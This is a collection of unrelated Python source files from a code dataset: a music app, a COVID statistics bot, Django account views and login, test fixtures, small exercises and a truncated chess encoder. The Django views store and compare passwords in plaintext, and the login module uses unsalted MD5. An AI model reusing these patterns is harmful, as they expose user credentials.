times[ticks[ind][1]] += curr_beat-tot\n else:\n times[ticks[ind][1]] = curr_beat-tot\n tot = curr_beat\n else:\n tot += left\n ticks_passed = 0\n if ticks[ind][1] in times:\n times[ticks[ind][1]] += left\n else:\n times[ticks[ind][1]] = left\n ind += 1\n big = 80\n note = 0\n print(times)\n for guy in times:\n if times[guy] > big and guy != 0:\n note = guy\n big = times[guy]\n duration_midi.append((60*curr_beat/480/self.tempo_map.get_tempo(), note))\n tick_length -= curr_beat\n curr_beat = min(480, tick_length)\n duration_midi = [(0.1,0)] + duration_midi\n self.midi_notes = duration_midi\n #find harmonies\n self.live_wave = wave_gen\n good = False\n for i in duration_midi:\n if i[1] > 0:\n good = True\n break\n if good:\n duration_midi = harmony.harmonize(duration_midi, self.genre, brange = self.bass[self.indices[0]][0],\n trange = self.tenor[self.indices[1]][0],\n arange = self.alto[self.indices[2]][0])\n #print([[i[1] for i in j] for j in duration_midi])\n \n # cheat to use SimpleTempoMap\n tempo = self.tempo_map.get_tempo()\n multiplier = 1/60*tempo*480\n converted_midi_duration = [[(i*multiplier, j)\n for i, j in k] for k in duration_midi]\n #make NoteSequencers\n for i in range(3):\n self.seq[i] = NoteSequencer(\n self.sched, self.synth, i+1, self.instruments[i][self.indices[i]][1], \n converted_midi_duration[i+1], self.scene.add_note_sprite, True)\n \n def play_recording(self, tick):\n for i in self.seq:\n if i is not None:\n i.start()\n if self.live_wave:\n self.live_wave.play()\n if self.live_wave not in self.mixer.generators:\n self.mixer.add(self.live_wave)\n\n def start_playing(self):\n if self.playing:\n return\n self.metro.stop()\n self.playing = True\n \n now = self.sched.get_tick()\n next_beat = quantize_tick_up(now, kTicksPerQuarter*4)\n self.cmd = self.sched.post_at_tick(self.play_recording, next_beat)\n\n def stop_playing(self):\n if not self.playing:\n return\n\n self.playing = False\n for i in self.seq:\n i.stop()\n self.live_wave.reset()\n\n self.sched.cancel(self.cmd)\n self.cmd = None\n\n def toggle_playing(self):\n print(self.playing)\n if self.playing:\n self.stop_playing()\n else:\n self.start_playing()\n\n def get_live_wave(self):\n if self.live_wave:\n return WaveGenerator(self.current_wave_file, True), self.seq.copy()\n\n def set_live_wave(self, new_live_wave, note_sequencers):\n if self.live_wave:\n if self.live_wave is not None:\n try:\n self.mixer.remove(self.live_wave)\n except:\n pass\n\n for i in self.seq:\n if i is not None:\n i.stop()\n self.seq = note_sequencers\n for i in self.seq:\n if i is not None:\n i.start()\n self.live_wave = new_live_wave\n self.mixer.add(self.live_wave)\n self.start_playing()\nclass ImageButton(ButtonBehavior, Image):\n pass\n\nclass Vocagen(App):\n\n def build(self):\n Window.size = (800, 450)\n intro = IntroScreen()\n return intro\n\n def on_start(self, **kwargs):\n start_popup = StartPopup()\n start_popup.open()\n\nVocagen().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"470849917","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nModulo corona\r\nClasses que fornecem dados sobre o corona virus\r\n\r\n\"\"\"\r\n\r\nimport io\r\nimport unicodedata\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\n\r\nfrom matplotlib.ticker import MaxNLocator\r\nfrom datetime import datetime\r\nfrom urllib.request import urlopen, Request\r\nfrom urllib.error import URLError\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\n\r\nbr_ufs = {\r\n 'RO': {'uid': '11', 'name': 'Rondônia'},\r\n 'AC': {'uid': '12', 'name': 'Acre'},\r\n 'AM': {'uid': '13', 'name': 'Amazonas'},\r\n 'RR': {'uid': '14', 'name': 'Roraima'},\r\n 'PA': {'uid': '15', 'name': 'Pará'},\r\n 'AP': {'uid': '16', 'name': 'Amapá'},\r\n 'TO': {'uid': '17', 'name': 'Tocantins'},\r\n 'MA': {'uid': '21', 'name': 'Maranhão'},\r\n 'PI': {'uid': '22', 'name': 'Piauí'},\r\n 'CE': {'uid': '23', 'name': 'Ceará'},\r\n 'RN': {'uid': '24', 'name': 'Rio Grande do Norte'},\r\n 'PB': {'uid': '25', 'name': 'Paraíba'},\r\n 'PE': {'uid': '26', 'name': 'Pernambuco'},\r\n 'AL': {'uid': '27', 'name': 'Alagoas'},\r\n 'SE': {'uid': '28', 'name': 'Sergipe'},\r\n 'BA': {'uid': '29', 'name': 'Bahia'},\r\n 'MG': {'uid': '31', 'name': 'Minas Gerais'},\r\n 'ES': {'uid': '32', 'name': 'Espírito Santo'},\r\n 'RJ': {'uid': '33', 'name': 'Rio de Janeiro'},\r\n 'SP': {'uid': '35', 'name': 'São Paulo'},\r\n 'PR': {'uid': '41', 'name': 'Paraná'},\r\n 'SC': {'uid': '42', 'name': 'Santa Catarina'},\r\n 'RS': {'uid': '43', 'name': 'Rio Grande do Sul'},\r\n 'MS': {'uid': '50', 'name': 'Mato Grosso do Sul'},\r\n 'MT': {'uid': '51', 'name': 'Mato Grosso'},\r\n 'GO': {'uid': '52', 'name': 'Goiás'},\r\n 'DF': {'uid': '53', 'name': 'Distrito Federal'}\r\n}\r\n\r\n\r\ndef _normalize_case(text):\r\n if isinstance(text, str):\r\n return unicodedata.normalize(\"NFKD\", text.casefold())\r\n else:\r\n return None\r\n\r\n\r\ndef case_less_eq(left, right):\r\n return _normalize_case(left) == _normalize_case(right)\r\n\r\n\r\ndef http_get(url, headers={}, expected=200):\r\n \"\"\"return a request object from a url using http get\r\n \"\"\"\r\n hdr = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml,application/json;q=0.9,*/*;q=0.8'}\r\n hdr.update(headers)\r\n\r\n try:\r\n req = Request(url, headers=hdr)\r\n response = urlopen(req)\r\n return response if response.getcode() == expected else None\r\n except URLError:\r\n return None\r\n\r\n\r\nclass CoronaData(object):\r\n\r\n def __init__(self):\r\n self._raw_data = {}\r\n self._version = 0\r\n self._has_new_data = False\r\n self._last_date = None\r\n self._data_source = \"\"\r\n self._region = \"\"\r\n\r\n @property\r\n def data_source(self):\r\n return self._data_source\r\n\r\n @property\r\n def description(self):\r\n return self.get_description()\r\n\r\n def get_description(self, changes=None):\r\n if self._last_date:\r\n categories = {\r\n 0: \"🦠 Confirmados\",\r\n 1: \"💀 Óbitos\",\r\n 2: \"🙂 Recuperados\"\r\n }\r\n data = self.get_data()\r\n cases = []\r\n for k, v in categories.items():\r\n if data[k]:\r\n description = \"{}: *{:d}*\".format(v, data[k])\r\n if changes and changes[k] > 0:\r\n description = \"{} 🔺 +{:d}\".format(description, changes[k])\r\n cases.append(description)\r\n if data[0] > 0 and data[1] > 0:\r\n death_rate = data[1] / data[0]\r\n cases.append(\"📈 Letalidade: *{:2.1%}*\".format(death_rate))\r\n result = \"{} em {}\\n{}\\n\".format(self.data_source,\r\n self.last_date.strftime(\"%d-%m-%Y %H:%M\"),\r\n \"\\n\".join(cases))\r\n else:\r\n result = \"Fonte: {} - Não há dados disponíveis\\n\".format(self.region, self.data_source)\r\n return result\r\n\r\n @property\r\n def last_date(self):\r\n return self._last_date\r\n\r\n @property\r\n def region(self):\r\n return self._region\r\n\r\n def refresh(self):\r\n if self._load_data():\r\n self._update_stats()\r\n\r\n def get_data(self):\r\n \"\"\"Implementado na subclasse para retornar os dados em um array\r\n com os seguintes valores nessa ordem: [confirmados, mortes, recuperados]\r\n A data é informada pela propriedade last_date\r\n \"\"\"\r\n return None\r\n\r\n def get_series(self):\r\n \"\"\"Implementado na subclasse para retornar a series de dados padrão por data\r\n A serie é um dicionario com a chave sendo a data e o valor sendo um\r\n array no padrão do _get_data\r\n \"\"\"\r\n return None\r\n\r\n def _get_cases(self):\r\n \"\"\"Implementado na subclasse para retornar os dados da fonte\"\"\"\r\n return None\r\n\r\n def _update_stats(self):\r\n \"\"\"processa os dados coletados\"\"\"\r\n pass\r\n\r\n def _load_data(self):\r\n \"\"\"Carrega os dados e retorna True se houver uma nova versão disponível\"\"\"\r\n pass\r\n\r\n\r\nclass SeriesChart(object):\r\n\r\n def __init__(self, *args):\r\n self.series = []\r\n self.regions = []\r\n self.source = args[0].data_source\r\n for corona in args:\r\n self.series.append(corona.get_series())\r\n self.regions.append(corona.region)\r\n\r\n def validate(self):\r\n for series in self.series:\r\n if not series:\r\n return False\r\n return True\r\n\r\n def image(self):\r\n x_axis = []\r\n y_axis = {}\r\n\r\n fig = plt.figure(figsize=(10, 5))\r\n\r\n if len(self.series) == 1:\r\n categories = {\r\n 0: \"Confirmados\"\r\n # 1: \"Mortos\",\r\n # 2: \"Recuperados\"\r\n }\r\n for k in categories:\r\n y_axis[k] = []\r\n series = self.series[0]\r\n for date, values in series.items():\r\n x_axis.append(date)\r\n for k in categories:\r\n y_axis[k].append(values[k])\r\n for k, v in categories.items():\r\n plt.plot(x_axis, y_axis[k], label=v)\r\n plt.title(\"Contaminação pelo COVID-19 : {} - Fonte: {}\".format(self.regions[0], self.source))\r\n else:\r\n dates = {}\r\n for i, series in enumerate(self.series):\r\n y_axis[i] = []\r\n for date in series:\r\n dates[date] = None\r\n x_axis = [k for k in dates.keys()]\r\n x_axis.sort()\r\n for i, series in enumerate(self.series):\r\n for date in x_axis:\r\n if date in series:\r\n y_axis[i].append(series[date][0])\r\n else:\r\n if len(y_axis[i]) > 0:\r\n y_axis[i].append(y_axis[i][-1])\r\n else:\r\n y_axis[i].append(0)\r\n plt.plot(x_axis, y_axis[i], label=self.regions[i])\r\n plt.title(\"COVID-19 : Confirmados - Fonte: {}\".format(self.source))\r\n\r\n ax = plt.gca()\r\n locator = mdates.AutoDateLocator(minticks=3, maxticks=7)\r\n ax.xaxis.set_major_locator(locator)\r\n ax.xaxis.set_major_formatter(mdates.ConciseDateFormatter(locator))\r\n ax.yaxis.get_major_formatter().set_scientific(False)\r\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\r\n\r\n plt.xlabel('Data')\r\n plt.ylabel('Quantidade')\r\n plt.legend()\r\n\r\n file = io.BytesIO()\r\n fig.savefig(file, bbox_inches='tight', dpi=150, format=\"png\")\r\n image = Image.open(file)\r\n\r\n bio = io.BytesIO()\r\n bio.name = 'series.png'\r\n image.save(bio, 'PNG')\r\n bio.seek(0)\r\n return bio\r\n\r\n\r\nclass DataPanel(object):\r\n\r\n def __init__(self, *args):\r\n self._series = args\r\n self._font = ImageFont.truetype('res/RobotoMono-Bold.ttf', size=18)\r\n self._font_lg = ImageFont.truetype('res/RobotoMono-Bold.ttf', size=24)\r\n self._font_sm = ImageFont.truetype('res/RobotoMono-Bold.ttf', size=14)\r\n\r\n def _draw_header(self, draw):\r\n header = [\"{:^10}\".format(h) for h in [\"Confirmados\", \"Mortes\", \"Recuperados\"]]\r\n header.insert(0, \"{:16}\".format(\"Fonte\"))\r\n draw.text((70, 100), \"\".join(header), fill=\"rgb(49,0,196)\", font=self._font_lg)\r\n\r\n def _draw_data(self, draw, corona, row):\r\n draw.text((70, 165 + 72 * row), \"{:20}\".format(corona.data_source), fill=\"rgb(0,0,0)\", font=self._font)\r\n data = corona.get_data()\r\n values = [\"{:^10}\".format(\"{:d}\".format(v)) for v in data]\r\n draw.text((310, 160 + 72 * row), \"\".join(values), fill=\"rgb(0,0,0)\", font=self._font_lg)\r\n text = \"{}\".format(datetime.strftime(corona.last_date, \"%d-%m-%Y %H:%M\"))\r\n if data[0] and data[1]:\r\n death_rate = (data[1] or 0) / data[0]\r\n text = \"{} - Letalidade: {:2.1%}\".format(text, death_rate)\r\n draw.text((70, 200 + 72 * row), text, fill=\"rgb(0,0,0)\", font=self._font_sm)\r\n\r\n def _draw_region(self, draw, region):\r\n draw.text((70, 480), \"Região: {}\".format(region), fill=\"rgb(0,0,0)\", font=self._font_lg)\r\n\r\n def image(self):\r\n image = Image.open('res/panel.png')\r\n draw = ImageDraw.Draw(image)\r\n self._draw_header(draw)\r\n for i, corona in enumerate(self._series):\r\n if i == 0:\r\n self._draw_region(draw, corona.region)\r\n self._draw_data(draw, corona, i)\r\n\r\n bio = io.BytesIO()\r\n bio.name = 'series.png'\r\n image.save(bio, 'PNG')\r\n bio.seek(0)\r\n return bio\r\n\r\n\r\n","sub_path":"dasbot/corona.py","file_name":"corona.py","file_ext":"py","file_size_in_byte":9779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"353027117","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom desenvolvedor.models import Desenvolvedor\nfrom .forms import RegistroForm, LoginForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.db import transaction\n\n\n# Create your views here.\n\n\ndef index(request):\n if 'desenvolvedor_id' in request.session:\n return redirect('ar_index')\n else:\n return render(request, 'index.html')\n\n\ndef enter(request):\n form = LoginForm()\n return render(request, 'login.html', {'form': form})\n\n\ndef new(request):\n form = RegistroForm()\n return render(request, 'new.html', {'form': form})\n\n\ndef create(request):\n form = RegistroForm(request.POST)\n if form.is_valid():\n novo_desenvolvedor = Desenvolvedor(nome=request.POST['nome'], email=request.POST['email'],\n senha=request.POST['senha'])\n novo_desenvolvedor.save()\n messages.success(request, 'Desenvolvedor criado com sucesso')\n else:\n messages.warning(request, 'Formulário inválido')\n return redirect('desenvolvedor_index')\n\n\ndef login(request):\n try:\n desenvolvedor_existente = Desenvolvedor.objects.get(email=request.POST['email'])\n if desenvolvedor_existente.email == request.POST['email'] and desenvolvedor_existente.senha == request.POST[\n 'senha']:\n request.session['desenvolvedor_id'] = desenvolvedor_existente.id\n return redirect('ar_index')\n else:\n messages.warning(request, 'Email ou Senha inválidos. Verifique os dados e tente novamente')\n except Desenvolvedor.DoesNotExist:\n messages.warning(request, 'Desenvolvedor inexistente')\n return redirect('desenvolvedor_index')\n\n\ndef logout(request):\n request.session.flush()\n messages.success(request, 'Desenvolvedor saiu com sucesso')\n return redirect('desenvolvedor_index')\n\n\ndef edit(request):\n antigo_desenvolvedor = Desenvolvedor.objects.get(id=request.session['desenvolvedor_id'])\n form = RegistroForm(instance=antigo_desenvolvedor)\n return render(request, 'edit.html', {'form': form})\n\n\ndef update(request):\n antigo_desenvolvedor = Desenvolvedor.objects.get(id=request.session['desenvolvedor_id'])\n desenvolvedor_atualizado = RegistroForm(request.POST, instance=antigo_desenvolvedor)\n if desenvolvedor_atualizado.is_valid():\n desenvolvedor_atualizado.save()\n messages.success(request, 'Desenvolvedor atualizado com sucesso')\n else:\n messages.warning(request, 'Formulário inválido')\n return redirect('desenvolvedor_index')\n\n\ndef delete(request):\n with transaction.atomic():\n desenvolvedor_atual = Desenvolvedor.objects.get(id=request.session['desenvolvedor_id'])\n desenvolvedor_atual.delete()\n messages.success(request, 'Desenvolvedor apagado com sucesso')\n return redirect('desenvolvedor_logout')\n","sub_path":"ref-mac0350/mac0350fase3/desenvolvedor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"447427398","text":"from day01_python基础.utils import DriverUtil\nclass MusicPlayer(object):\n #全局变量\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super().__new__(cls)\n # 如果不返回任何结果,\n return cls._instance\n\n def __init__(self):\n print(\"初始化⾳乐播放对象\")\n\n\nplayer1 = MusicPlayer()\n\nplayer2 = MusicPlayer()\nprint(player1)\nprint(player2)\n\ndriver1 = DriverUtil.get_driver()\nprint(driver1)\ndriver2 = DriverUtil.get_driver()\nprint(driver2)\n\n\n","sub_path":"day01_python基础/hm12_单例设计模式.py","file_name":"hm12_单例设计模式.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"588757177","text":"def app(environ, start_response):\n body = b'abcdefghi'\n cl = len(body)\n if environ['PATH_INFO'] == '/short_body':\n cl = len(body) +1\n if environ['PATH_INFO'] == '/long_body':\n cl = len(body) -1\n start_response(\n '200 OK',\n [('Content-Length', str(cl)), ('Content-Type', 'text/plain')]\n )\n return [body]\n\nif __name__ == '__main__':\n from waitress.tests.support import start_server\n start_server(app)\n","sub_path":"waitress/tests/fixtureapps/badcl.py","file_name":"badcl.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"540396059","text":"# Please think of a number between 0 and 100!\n# Is your secret number 50?\n# Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed\n# correctly. l\n# Game over. Your secret number was: 83\n# Sorry, I did not understand your input.\n\ni = 50\nll = 0\nrl = 100\nprint('Please think of a number between 0 and 100!')\nr = ''\nwhile (r != 'c'):\n print('Is your secret number ', i, '?')\n r = input(\n \"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed\")\n if (r != 'h' and r != 'l' and r != 'c'):\n print('Sorry, I did not understand your input.')\n elif (r == 'c'):\n print('Game over. Your secret number was: ', i)\n break\n elif (r == 'h'):\n rl = i\n i = int(i - (i - ll) / 2)\n else:\n ll = i\n i = int(i + (rl - i) / 2)\n","sub_path":"src/BisectionSearch.py","file_name":"BisectionSearch.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"592875219","text":"import numpy as np\n\n#*************\n# Not Tested\n#*************\n\nN=[]\n\n# Recursively give label to this pixel \n# and all it foreground neighbours.\ndef label(x_start,y_start,n,B,L):\n L[y_start][x_start]= n\n for (y,x) in N[y_start][x_start]:\n if L[y][x]==0 and B[y][x]:\n label(x,y,n,B,L) \n \n#B is the binary image input.\n#L is the labeled image output \ndef ConnectedComponents(B):\n X,Y = B.shape\n L = np.zeros([X,Y])\n n=0\n for (y,x) in B:\n if B[y][x] and L[y][x]==0:\n label(x,y,n,B,L)\n n = n + 1\n return L ","sub_path":"ComputerVision/Week_8/Page_43_Connected_Component_Labeling.py","file_name":"Page_43_Connected_Component_Labeling.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"641365108","text":"#-*- coding:utf-8 -*-\n__author__ = 'liubf'\n\nimport json,datetime\nfrom io import BytesIO\n\nfrom django.db import connection\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport decimal\nfrom sellcard.models import AdminUser,DiscountRate,Shops\nfrom sellcard.common import Method as mtu,Constants as cts\n\n\ndef index(request):\n\n return render(request, \"login.html\")\n\n#登录\ndef login(request):\n user_name = mtu.getReqVal(request,\"user_name\",\"\").strip()\n password = mtu.getReqVal(request,\"password\",\"\").strip()\n vcode = mtu.getReqVal(request,\"vcode\",\"\").strip()\n try:\n vcode2 = request.session[\"s_vcode\"]\n except:\n vcode2 = \"\"\n\n response_data = {}\n try:\n if vcode == vcode2:\n # 查询用户信息\n user = AdminUser.objects.get(user_name=user_name,is_enable='0')\n upwd = user.password\n password = mtu.md5(password)\n shop_code=user.shop_code\n rates = DiscountRate.objects.values('val_min','val_max','discount_rate').filter(shopcode=shop_code)\n\n discLevelList = Shops.objects.values('disc_level').filter(shop_code=shop_code)\n discLevel = ''\n if len(discLevelList)>0:\n discLevel = discLevelList[0]['disc_level']\n rateList=[]\n for rate in rates:\n item={}\n item['val_min']=float(rate['val_min'])\n item['val_max']=float(rate['val_max'])\n item['discount_rate']=float(rate['discount_rate'])\n rateList.append(item)\n\n if upwd == password:\n request.session[\"s_uname\"] = user.user_name\n request.session[\"s_unameChinese\"] = user.name\n request.session[\"s_roleid\"] = user.role_id\n request.session[\"s_shopid\"] = user.shop_id\n request.session[\"s_shopcode\"] = user.shop_code\n request.session[\"s_depart\"] = user.depart\n request.session[\"s_uid\"] = user.id\n request.session[\"s_rates\"] = rateList\n request.session[\"disc_level\"] = discLevel\n\n #售卡前台\n response_data['homeurl'] = cts.URL_HOME[0]\n\n request.session[\"homeurl\"] = response_data['homeurl']\n\n # 查询菜单权限\n purlist = findNavByRcode(user.role_id)\n request.session[\"s_umenu\"] = getMenu(purlist)\n response_data['status'] = \"0\"\n else:\n response_data['status'] = \"2\"\n else:\n response_data['status'] = \"3\"\n except Exception as e:\n print(e)\n response_data['status'] = \"1\"\n\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\ndef getMenu(purlist):\n m1list = sorted(purlist, key=lambda pur: pur[\"nav_id\"])\n menu_dict = {}\n if m1list:\n for p in m1list:\n if p[\"parent_id\"]=='-1':\n p.setdefault(\"sub\",[])\n menu_dict.setdefault(\"nav_\"+str(p[\"nav_id\"]),p)\n else:\n pid = str(p[\"parent_id\"])\n if \"nav_\"+pid in menu_dict and \"sub\" in menu_dict[\"nav_\"+pid]:\n menu_dict[\"nav_\"+pid][\"sub\"].append(p)\n menu_list = [item for item in menu_dict.values()]\n\n menu_list = sorted(menu_list, key=lambda menu: menu[\"sort_id\"])\n for item in menu_list:\n temp = sorted(item['sub'],key=lambda obj: obj[\"sort_id\"])\n item['sub'] = temp\n return menu_list\n\n\n#根据角色编码查询菜单\ndef findNavByRcode(rcodes):\n sql = \"select DISTINCT r.role_id,r.nav_id, \"\n sql += \"n.nav_name,n.parent_id,n.url, \"\n sql += \"n.sort_id,n.icon \"\n sql += \"from role_nav r,nav_list n \"\n sql += \"where r.nav_id=n.nav_id \"\n sql += \"and n.flag=0 \"\n if rcodes:\n sql += \"and r.role_id in (\" + rcodes + \") \"\n\n sql += \"order by n.sort_id \"\n\n cursor = connection.cursor()\n cursor.execute(sql)\n plist = cursor.fetchall()\n rslist = []\n if plist:\n for p in plist:\n item = []\n item.append((\"role_id\",p[0]))\n item.append((\"nav_id\",p[1]))\n item.append((\"nav_name\",p[2]))\n item.append((\"parent_id\",p[3]))\n item.append((\"url\",p[4]))\n item.append((\"sort_id\",p[5]))\n item.append((\"icon\",p[6]))\n rslist.append(dict(item))\n return rslist\n\n\n#验证码\ndef vcode(request):\n image = mtu.verifycode(request,'s_vcode')\n #将image信息保存到BytesIO流中\n buff = BytesIO()\n image.save(buff,\"png\")\n return HttpResponse(buff.getvalue(),'image/png')\n\n#注销\ndef logout(request):\n try:\n del request.session[\"s_uname\"]\n del request.session[\"s_roleid\"]\n del request.session[\"s_vcode\"]\n del request.session[\"s_umenu\"]\n del request.session[\"homeurl\"]\n except:\n print(\"session[s_uname]不存在\")\n\n return render(request,\"login.html\")\n\ndef updatePwd(request):\n data = {}\n if request.method == 'POST':\n\n userId =request.session[\"s_uid\"]\n try:\n newPwd = mtu.getReqVal(request,\"newPwd\",\"\")\n pwd = mtu.md5(newPwd)\n AdminUser.objects.filter(id=userId).update(password=pwd)\n data[\"result\"] = \"0\"\n except Exception as e:\n print(e)\n\n return render(request,'restPassword.html',locals())\n\n","sub_path":"sellcard/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"171772369","text":"from django.core.urlresolvers import reverse\nfrom django.contrib.messages.storage.fallback import FallbackStorage\nfrom django.contrib.messages import get_messages\nfrom django.conf import settings\n\nfrom ...models import GroupAccount\nfrom ...forms import BulkUserUploadForm\nfrom ...views import upload_user_list\n\nfrom . import GroupAdminViewsTests \n\nimport os\n\nclass UploadUserListTests(GroupAdminViewsTests):\n\n def test_upload_user_list_post(self):\n group = GroupAccount.objects.create(name='CUG', max_no_of_users=10)\n self.subscriber.group = group\n self.subscriber.save()\n\n with open(os.path.join(settings.BASE_DIR, 'accounts/tests/test_files/test.csv'), 'r') as _file:\n request = self.factory.post(reverse('accounts:upload_user_list'), {'user_list': _file})\n\n request.user = self.user\n\n self.session.process_request(request)\n request.session.save()\n\n messages = FallbackStorage(request)\n setattr(request, '_messages', messages)\n\n response = upload_user_list(request)\n storage = get_messages(request)\n\n lst = []\n for message in storage:\n lst.append(message)\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual('Users added successfully.', lst[0].__str__())\n self.assertEqual(response.get('location'), reverse('accounts:upload_user_list'))\n\n def test_upload_user_list_get(self):\n self.c.post(reverse('accounts:login'), {'username': '0542751610', 'password': '12345'})\n response = self.c.get(reverse('accounts:upload_user_list'))\n\n self.assertEqual(response.status_code, 200)\n self.assertTrue('form' in response.context)\n self.assertTrue('file_length' in response.context)\n self.assertEqual(response.context['file_length'], settings.MAX_FILE_LENGTH)\n self.assertTrue(isinstance(response.context['form'], BulkUserUploadForm))\n self.assertTemplateUsed(response, 'accounts/upload_user_list.html')\n","sub_path":"accounts/tests/views/test_upload_user_list.py","file_name":"test_upload_user_list.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"591656001","text":"import glob\nimport os\nimport unicodedata\nimport string\n\nall_letters = string.ascii_letters + \" .,;'-\"\nn_letters = len(all_letters) + 1 # Plus EOS marker\n\n\ndef find_files(path):\n return glob.glob(path)\n\n\n# Turn a Unicode string to plain ASCII, thanks to https://stackoverflow.com/a/518232/2809427\ndef unicode_to_ascii(s):\n return \"\".join(\n c\n for c in unicodedata.normalize(\"NFD\", s)\n if unicodedata.category(c) != \"Mn\" and c in all_letters\n )\n\n\n# Read a file and split into lines\ndef read_lines(filename):\n lines = open(filename, encoding=\"utf-8\").read().strip().split(\"\\n\")\n return [unicode_to_ascii(line) for line in lines]\n\n\n# Build the category_lines dictionary, a list of lines per category\ncategory_lines = {}\nall_categories = []\nfor filename in find_files(\"data/names/*.txt\"):\n category = os.path.splitext(os.path.basename(filename))[0]\n all_categories.append(category)\n lines = read_lines(filename)\n category_lines[category] = lines\n\nn_categories = len(all_categories)\n\nif n_categories == 0:\n raise RuntimeError(\n \"Data not found. Make sure that you downloaded data \"\n \"from https://download.pytorch.org/tutorial/data.zip and extract it to \"\n \"the current directory.\"\n )\n\nprint(\"# categories:\", n_categories, all_categories)\nprint(unicode_to_ascii(\"O'Néàl\"))\n","sub_path":"pytorch/generate-names/src/prepare-data.py","file_name":"prepare-data.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187341562","text":"from dal import autocomplete\n\nfrom django.conf.urls import url\n\nfrom .models import TestModel\n\n\nclass LinkedDataView(autocomplete.Select2QuerySetView):\n def get_queryset(self):\n qs = super(LinkedDataView, self).get_queryset()\n owner = self.forwarded.get('owner', None)\n\n if owner:\n qs = qs.filter(owner_id=owner)\n\n return qs\n\n\nurlpatterns = [\n url(\n '^linked_data/$',\n LinkedDataView.as_view(model=TestModel),\n name='linked_data'\n ),\n]\n","sub_path":"annexes/django-autocomplete-light/test_project/linked_data/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"239422206","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\nimport chess\n\nimport chess.pgn\n\nimport numpy as np\n\nimport random\n\n\n\n\n\n# all possible pairs of starting square and target square\n\ncolumn_numbers = {\n 'a':1,\n 'b':2,\n 'c':3,\n 'd':4,\n 'e':5,\n 'f':6,\n 'g':7,\n 'h':8\n}\n\ncolumns = 'abcdefgh'\nrows = '12345678'\nsquares = []\nfor c in columns:\n for r in rows:\n squares.append(''.join([c,r]))\n \nsquare_pairs = []\nfor sq1 in squares:\n for sq2 in squares:\n square_pairs.append(''.join([sq1,sq2]))\n\nindex2moves = [] # ['0-0','0-0-0'] Rochade ist e1g1 etc.\nfor pair in square_pairs:\n if pair[0:2]!=pair[2:]: \n if pair[0] == pair[2]: # gerade hoch\n index2moves.append(pair)\n if pair[1] == pair[3]: # gerade seitwärts\n index2moves.append(pair)\n if abs(int(pair[1])-int(pair[3])) == abs(column_numbers[pair[0]]-column_numbers[pair[2]]): #diagonal\n index2moves.append(pair)\n if abs(int(pair[1])-int(pair[3])) == 1 and abs(column_numbers[pair[0]]-column_numbers[pair[2]])==2: # Springer\n index2moves.append(pair)\n if abs(int(pair[1])-int(pair[3])) == 2 and abs(column_numbers[pair[0]]-column_numbers[pair[2]])==1: # Springer\n index2moves.append(pair)\n \n if (pair[3]=='8' and pair[1]=='7') or (pair[3]=='1' and pair[1]=='2'): # Umwandlungen\n if abs(column_numbers[pair[0]]-column_numbers[pair[2]])<=1:\n index2moves.append(pair+'q')\n index2moves.append(pair+'n')\n index2moves.append(pair+'b')\n index2moves.append(pair+'r')\n\nindex2moves = list(set(index2moves))\nindex2moves = sorted(index2moves)\n\nmove2label = {}\nfor i,move in enumerate(index2moves + ['0000']): # + Nullmove\n move2label[move] = i\n\n# Hier die pure-transformer 64*64 output version: In der Reihenfolge der Token, d.h. auch der FEN.\n# output[startsquareindex][zielsquareindex] \npure_square = {}\nfor row in range(8,0,-1):\n for column in 'abcdefgh':\n pure_square[column+str(row)] = len(pure_square)\n\n\n# Tokenization of a chess position\n\ntoken2piece = '0KkQqBbNnRrPp'\n\nfen2token_dict = {\n 'K':np.array([1]),\n 'k':np.array([2]),\n 'Q':np.array([3]),\n 'q':np.array([4]),\n 'B':np.array([5]),\n 'b':np.array([6]),\n 'N':np.array([7]),\n 'n':np.array([8]),\n 'R':np.array([9]),\n 'r':np.array([10]),\n 'P':np.array([11]),\n 'p':np.array([12]),\n '1':np.array([0]),\n '2':np.array([0,0]),\n 